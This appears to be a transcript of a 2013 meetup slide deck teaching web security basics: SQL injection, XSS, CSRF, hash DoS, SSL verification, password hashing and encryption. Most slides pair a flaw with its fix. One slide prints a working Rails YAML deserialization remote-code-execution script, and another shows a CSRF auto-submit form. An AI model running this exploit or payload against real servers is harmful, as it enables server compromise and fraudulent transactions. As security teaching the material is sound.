$30 off During Our Annual Pro Sale. View Details »

Security for dummies

Security for dummies

Presentation given at the Enschede Web Developers meetup

Dirkjan Bussink

June 25, 2013
Tweet

More Decks by Dirkjan Bussink

Other Decks in Technology

Transcript

  1. Dirkjan Bussink
    [email protected]
    twitter.com/dbussink
    github.com/dbussink

    View Slide

  2. Security 101
    The very very basics

    View Slide

  3. Not part of today

    View Slide

  4. Social
    Engineering
    Because there is no patch
    for human stupidity

    View Slide

  5. statement = "SELECT * FROM users WHERE name = '" + username + "'"
    SQL Injection

    View Slide

  6. View Slide

  7. statement = ["SELECT * FROM users WHERE name = ?", username]
    SQL Injection
    Parameter binding

    View Slide

  8. Cross site
    scripting
    <%= person.name %>
    Inject Javascript!

    View Slide

  9. Mass assignment









    What if I add this?

    View Slide

  10. Frameworks
    Solve it easily for you

    View Slide

  11. Remote code
    execution
    Let the server run my
    ruby rce.rb "Process.exit!"

    View Slide

  12. require 'net/http'
    require 'net/https'
    require 'uri'
    require 'yaml'
    code = ARVG[0]
    url = "http://localhost:3000"
    escaped_code = "foo; #{code}\n__END__\n"
    yaml = %{
    --- !ruby/hash:ActionDispatch::Routing::RouteSet::NamedRouteCollection
    ? #{escaped_code.to_yaml.sub('--- ','').chomp}
    : !ruby/object:OpenStruct
    table:
    :defaults:
    :action: create
    :controller: foos
    :required_parts: []
    :requirements:
    :action: create
    :controller: foos
    :segment_keys:
    - :format
    modifiable: true
    }.strip
    xml = %{

    #{yaml}
    }.strip
    uri = URI.parse(url)
    http = Net::HTTP.new(uri.host, uri.port)
    request = Net::HTTP::Post.new(uri.request_uri, "X-HTTP-Method-Override" => "GET")
    request.content_type = "text/xml"
    request.set_body_internal(xml)
    response = http.request(request)

    View Slide

  13. Direct object
    references
    http://myapp.com/people/1
    Let’s change this to 2!

    View Slide

  14. Access
    control
    Scope your queries

    View Slide

  15. External
    input
    Trust nobody

    View Slide

  16. View Slide

  17. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/;
    document.cookie => "session_id=lee2oochaekae4woh6A;"
    Steal cookie in combination
    with a XSS attack

    View Slide

  18. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly
    document.cookie => ""
    HttpOnly
    Disallows reading by Javascript

    View Slide

  19. Set-Cookie: session_id=lee2oochaekae4woh6A; path=/; HttpOnly; secure
    Secure
    Only send cookie over HTTPS

    View Slide

  20. Frameworks
    Use one that solves this

    View Slide

  21. CSRF
    Who submits your forms?

    View Slide

  22. View Slide

  23. On my evil hack site
    Just loading my page
    transfers money

    <br/>document.write('<form target=hack name=go<br/>method=post action="http://mybank.com/transfer.php"><br/></form>')<br/>go.submit()<br/>

    View Slide












  24. Add token to each form
    Token ensures other site
    can’t simply POST to your

    View Slide

  25. Hash DOS
    Crafting input
    to do DOS attack

    View Slide

  26. Bucket
    0
    1
    2
    3
    4
    5
    Figure 1: Normal operation of a hash table.
    suggested the use of crypto puzzles [9] to force
    clients to perform more work before the server does
    its work. Provably requiring the client to con-
    sume CPU time may make sense for fundamen-
    tally expensive operations like RSA decryption, but
    it seems out of place when the expensive opera-
    tion (e.g., HTML table layout) is only expensive
    because a poor algorithm was used in the system.
    Another recent paper [16] is a toolkit that allows
    programmers to inject sensors and actuators into a
    program. When a resource abuse is detected an ap-
    propriate action is taken.
    Bucket
    0
    1
    2
    3
    4
    5
    Figure 2: Worst-case hash table collisions.
    bles are so common that programming languages
    like Perl provide syntactic sugar to represent hash
    tables as “associative arrays,” making them easy for
    programmers to use. Programmers clearly prefer
    hash tables for their constant-time expected behav-
    ior, despite their worst-case O(n) per-operation run-
    ning time. After all, what are the odds that a hash
    table will degenerate to its worst case behavior?
    In typical usage, objects to be inserted into a
    hashtable are first reduced to a 32-bit hash value.
    Strings might be hashed using a checksum oper-
    Craft input for collision

    View Slide

  27. Hashes
    everywhere
    A lot of attack vectors

    View Slide

  28. SSL in your app
    Verify certificates

    View Slide

  29. curl_easy_setopt(download_handle, CURLOPT_SSL_VERIFYHOST, 2);
    2 is the magic value...

    View Slide

  30. $fp = fsockopen ('ssl://www.paypal.com', 443, $errno, $errstr, 30);
    fsockopen() does not
    validate server certificate
    PHP

    View Slide

  31. The “advanced” SSLSocketFactory API silently
    skips hostname verification if the algorithm field
    in the SSL client is NULL or an empty string rather
    than HTTPS
    Java
    Why this as the default?

    View Slide

  32. require "net/http"
    require "net/https"
    require "uri"
    uri = URI.parse("https://secure.site/")
    http = Net::HTTP.new uri.host, uri.port
    http.use_ssl = true
    http.verify_mode = OpenSSL::SSL::VERIFY_PEER
    request = Net::HTTP::Get.new(uri.request_uri)
    response = http.request(request)
    Ruby
    Does not validate
    certificate by default...

    View Slide

  33. Stupid API’s
    Know how to work with them

    View Slide

  34. Storing
    passwords
    Can I get the passwords
    stored in your database?

    View Slide

  35. View Slide

  36. But I’m safe, I hash and salt!
    Digest::SHA1.hexdigest(
    "#{password}--#{salt}"
    )

    View Slide

  37. 1.93% were between 6 and 10 characters long
    2.45% were comprised entirely of lowercase characters
    3.36% were found in a common password dictionary
    4.67% were reused by the same person on a totally unrelated service (Gawker)
    5.Only 1% of them contained a non-alphanumeric character
    77 million breached
    PlayStation Network accounts

    View Slide

  38. 260M checks / second
    GPU acceleration makes
    forcing viable these days

    View Slide

  39. Salted hashes are
    not good enough
    anymore

    View Slide

  40. Libraries
    Use them, don’t roll your ow

    View Slide

  41. bcrypt
    PBKDF2
    scrypt

    View Slide

  42. Designed
    to be slow

    View Slide

  43. KDF 6 letters 8 letters 8 chars 10 chars 40-char text
    DES CRYPT < $1 < $1 < $1 < $1 < $1
    MD5 < $1 < $1 < $1 $1.1k $1
    MD5 CRYPT < $1 < $1 $130 $1.1M $1.4k
    PBKDF2 (100 ms) < $1 < $1 $18k $160M $200k
    bcrypt (95 ms) < $1 $4 $130k $1.2B $1.5M
    scrypt (64 ms) < $1 $150 $4.8M $43B $52M
    PBKDF2 (5.0 s) < $1 $29 $920k $8.3B $10M
    bcrypt (3.0 s) < $1 $130 $4.3M $39B $47M
    scrypt (3.8 s) $900 $610k $19B $175T $210B

    View Slide

  44. I have something
    else now!
    Migration is not
    very hard

    View Slide

  45. Add new authentication
    When user logs in, store password in new way
    After X time remove old passwords

    View Slide

  46. Signing
    Don’t design your own

    View Slide

  47. user_id=1--kee0oiviemaeXiW7aeb8eexuthohyua
    Signed cookies
    Hash computed with secret

    View Slide

  48. http://myapp.com/profile/1/wa5eexuf9wiex1do
    Email URL with direct login
    Hash for one time login

    View Slide

  49. Digest::SHA1.hexdigest(
    "user_id=#{id}-#{secret_token}"
    )
    Hash with a secret
    Broken

    View Slide

  50. sha256 = OpenSSL::Digest::Digest.new('sha256')
    tag = OpenSSL::HMAC.hexdigest(sha256, secret_token, message)
    HMAC
    hash-based message authentication code

    View Slide

  51. Encryption
    Know what you are doing

    View Slide

  52. AES ECB
    Just don’t use it

    View Slide

  53. View Slide

  54. AES CBC / CTR
    When using CBC mode, an Initialization Vector (IV) is provided along
    with the key when starting an encrypt or decrypt operation.
    If CBC mode is selected and no IV is provided, an IV of all zeroes will be used.

    View Slide

  55. Don’t trust input
    Also sign encrypted data

    View Slide

  56. cookie = "j2x+8Y5CqDRnYqRvMsHmi61YBzA7qvc4f7agmYxdHgvqz
    7Jaekoxjp3MrgSvB3GU--kc/FbSvFIfIFzM0UzQhhvw=="
    Encrypted cookie
    aes-128-cbc

    View Slide

  57. "so long, and thanks for all the fish"

    View Slide

  58. Encrypt then MAC
    Verify that the
    data is authentic

    View Slide

  59. Authenticated
    encryption

    View Slide

  60. View Slide

  61. https://www.owasp.org/index.php/Top_10_2010-Main
    https://www.owasp.org/index.php/SQL_Injection
    https://www.owasp.org/index.php/Top_10_2010-A4
    https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
    https://www.owasp.org/index.php/Cross-Site_Request_Forgery_(CSRF)
    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003.pdf
    http://www.cs.utexas.edu/~shmat/shmat_ccs12.pdf
    http://www.troyhunt.com/2011/06/brief-sony-password-analysis.html
    http://gpuscience.com/cs/cracking-salted-sha1-password-hashes-on-gpu/
    http://www.bsdcan.org/2009/schedule/attachments/86_scrypt_slides.pdf
    http://en.wikipedia.org/wiki/Hash-based_message_authentication_code
    http://blog.jcoglan.com/2012/06/09/why-you-should-never-use-hash-functions-for-message-authentication/
    http://en.wikipedia.org/wiki/Block_cipher_modes_of_operation#Electronic_codebook_.28ECB.29
    http://en.wikipedia.org/wiki/Padding_oracle_attack
    http://tonyarcieri.com/all-the-crypto-code-youve-ever-written-is-probably-broken
    https://www.coursera.org/course/crypto
    Background

    View Slide